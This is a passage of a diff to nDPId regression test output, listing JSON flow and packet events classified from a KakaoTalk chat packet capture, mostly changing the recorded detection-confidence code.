-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069060011,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkUAAQAbmZgoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1430069072945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069072945,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTTnkAAQAbVigoYUrw2\/\/3H5i8UZ+uf0YYGiXPCgBQCY5HBAAABAQgKAAKjTTTnT0k="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069072986,"flow_last_seen":1430069072986,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069072986,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1430069072986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069072986,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwsMEAAQAZ88QoYUrw2\/\/3H5lQUZzqvj2AAAAAAoAI2sJHJAAACBAV4BAIICgACo1AAAAAAAQMDBQ=="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1430069073186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069073186,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQa8ITb\/\/ccKGFK8FGfmVG+Fj0U6r49hoBJF6jkFAAACBAV4BAIICjTom84AAqNQAQMDCA=="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1430069073186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069073186,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQsMUAAQAZ8+AoYUrw2\/\/3H5lQUZzqvj2FvhY9GgBABtpHBAAABAQgKAAKjZTTom84="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
-00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069072986,"flow_last_seen":1430069073299,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1466,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": 
